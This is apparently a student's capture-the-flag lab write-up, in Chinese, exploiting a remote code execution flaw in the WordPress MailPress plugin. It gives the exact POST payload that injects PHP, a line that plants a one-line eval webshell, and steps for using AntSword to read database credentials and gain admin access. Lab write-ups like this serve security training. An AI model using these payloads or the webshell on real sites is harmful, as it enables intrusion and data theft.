WordPress-Mailpress远程代码执行漏洞

在kali中使用火狐浏览器打开靶场192.168.7.200,看到题目。
在这里插入图片描述
访问题目给出的网址192.168.7.100。
在终端中使用WPScan扫描网址:

输入命令wpscan --url IP

在这里插入图片描述
然后扫描结果中显示Interesting Findings,仔细观察。
在这里我们主要对mailpress rce漏洞进行复现,找到flag。

步骤:

1.安装HackBar插件,浏览器右上角菜单-首选项-左下角扩展与主题-搜索,按F12/Fn+F12可使用插件.
在这里插入图片描述
2.调出插件,输入URL和要提交的数据,点击Execute执行,记住运行结果中的id。

http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php
post:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

在这里插入图片描述
在这里插入图片描述
3.只输入URL,点击执行,查看执行结果,找到root路径。

http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=上一步得到的ID

在这里插入图片描述
在这里插入图片描述
4.上传一句话木马,输入URL和要提交的数据,把前面的post数据中subject的数据改掉,改为一句话木马,点击Execute执行,出现下图执行成功。

<?php file_put_contents('C:/phpstudy123/WWW/eval.php','<?php @eval($_POST["c"]);?>');?>

在这里插入图片描述
5.打开蚁剑,右键添加数据,选中数据,右键-文件管理,打开配置文件,找到数据库相关信息。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
6.连接数据库,选中数据,右键-数据操作,在配置列表中添加配置,输入之前数据库信息中的用户名和密码,添加,双击flag,执行SQL语句,出现flag2。
在这里插入图片描述
在这里插入图片描述
7.回到原网页登陆界面,登录的用户名和密码可以使用万能密码试试,可以暴力破解,也可以在蚁剑中输入数据库语句修改密码,进去之后就能看到一个flag,打开后预览就能得到flag1。
在这里插入图片描述
在这里插入图片描述
8.登陆进去后左边有一列目录,挨个仔细查看,它们有可能藏在你意想不到的地方,最后可以找到flag3和flag4。
在这里插入图片描述
在这里插入图片描述
9.flag5需要进行远程连接才能得到,但是我连不上,所以这里先记录一下,以后补充。

最后,因为老师开的靶场已经关闭了,所以我没有截到flag3和flag4的图,文章中的截图是热心肠的同学给的,感谢给我提供图片的同学,好人一生平安。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值